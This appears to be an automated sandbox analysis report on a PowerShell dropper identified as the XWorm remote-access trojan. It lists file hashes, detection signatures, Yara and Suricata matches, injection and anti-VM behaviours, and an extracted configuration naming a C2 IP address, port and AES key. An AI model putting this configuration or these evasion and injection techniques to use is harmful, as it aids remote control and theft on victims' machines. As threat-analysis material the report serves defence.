Windows Analysis Report
Wn0FGQ53RW.ps1

Overview

General Information

Sample name: Wn0FGQ53RW.ps1
renamed because original name is a hash value
Original sample name: 96fcb55e93b282b6650cb439cd1a78bc0c723072826fd8f2e584d43d6fbac0c1.ps1
Analysis ID: 1599246
MD5: 2c54adfb1177ddcfbe5d7b775d69ac5d
SHA1: f9237539d22ca1c2a82d6bd2c4ee8f4e9b3aa14b
SHA256: 96fcb55e93b282b6650cb439cd1a78bc0c723072826fd8f2e584d43d6fbac0c1
Tags: 176-113-115-228bookingps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Explorer Process Tree Break
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.228"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: Wn0FGQ53RW.ps1 Virustotal: Detection: 9% Perma Link
Source: Wn0FGQ53RW.ps1 ReversingLabs: Detection: 13%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: 176.113.115.228
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: 4412
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: P0WER
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb" source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then jmp 011BE504h 6_2_011BE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then jmp 011BE516h 6_2_011BE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] 6_2_011B53BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 6_2_011B83B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] 6_2_011B445C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 6_2_011B5B68

Networking

barindex
Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858798 - Severity 1 - ETPRO MALWARE Win32/XWorm V2 CnC Command - PING Outbound : 192.168.2.4:49738 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2858805 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Network traffic Suricata IDS: 2858806 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 176.113.115.228:4412 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.4:49738
Source: Malware configuration extractor URLs: 176.113.115.228
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 176.113.115.228:4412
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.228
Source: svchost.exe, 00000009.00000002.2951230208.0000028AFEE0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF018000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF04D000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.1736362189.000001EE6F2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F051000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2160888258.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2048538649.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000002.2948824376.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2067340503.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2070457843.00000000063AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000000B.00000002.2948824376.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2067340503.00000000063AF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2070457843.00000000063AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmi
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2048538649.0000000005227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2048538649.0000000005211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1744127452.000001EE771D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1715523883.000001EE5F4E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1736362189.000001EE6F2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1715523883.000001EE60336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000009.00000003.2040570757.0000028AFF0C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.9.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8620 CreateDesktopA, 6_2_011B8620

System Summary

barindex
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B96103D 0_2_00007FFD9B96103D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F6C2D8 2_2_00F6C2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F66340 2_2_00F66340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F684B8 2_2_00F684B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F6B598 2_2_00F6B598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F65A70 2_2_00F65A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F65728 2_2_00F65728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F60FA0 2_2_00F60FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638EF38 2_2_0638EF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06382C48 2_2_06382C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638BCB0 2_2_0638BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638DD70 2_2_0638DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06388A68 2_2_06388A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387BC0 2_2_06387BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638E078 2_2_0638E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386928 2_2_06386928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063871C8 2_2_063871C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638C670 2_2_0638C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387658 2_2_06387658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387648 2_2_06387648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638C680 2_2_0638C680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638A6F0 2_2_0638A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638A700 2_2_0638A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385CA8 2_2_06385CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385CA3 2_2_06385CA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638BC8F 2_2_0638BC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638ACD8 2_2_0638ACD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638ACC8 2_2_0638ACC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638CD28 2_2_0638CD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638DD61 2_2_0638DD61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638AAA0 2_2_0638AAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638AA90 2_2_0638AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06387BB3 2_2_06387BB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638E068 2_2_0638E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06380040 2_2_06380040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386889 2_2_06386889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063898E8 2_2_063898E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063898D8 2_2_063898D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638B130 2_2_0638B130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638B121 2_2_0638B121
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06386923 2_2_06386923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06388915 2_2_06388915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063871B8 2_2_063871B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063889EF 2_2_063889EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C725677 2_2_0C725677
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C725688 2_2_0C725688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C720007 2_2_0C720007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721230 2_2_0C721230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721220 2_2_0C721220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0C721230 2_2_0C721230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BD830 6_2_011BD830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BCA00 6_2_011BCA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8018 6_2_011B8018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011BC4B0 6_2_011BC4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B8828 6_2_011B8828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B88B0 6_2_011B88B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B4A30 6_2_011B4A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 6_2_011B4A20 6_2_011B4A20
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
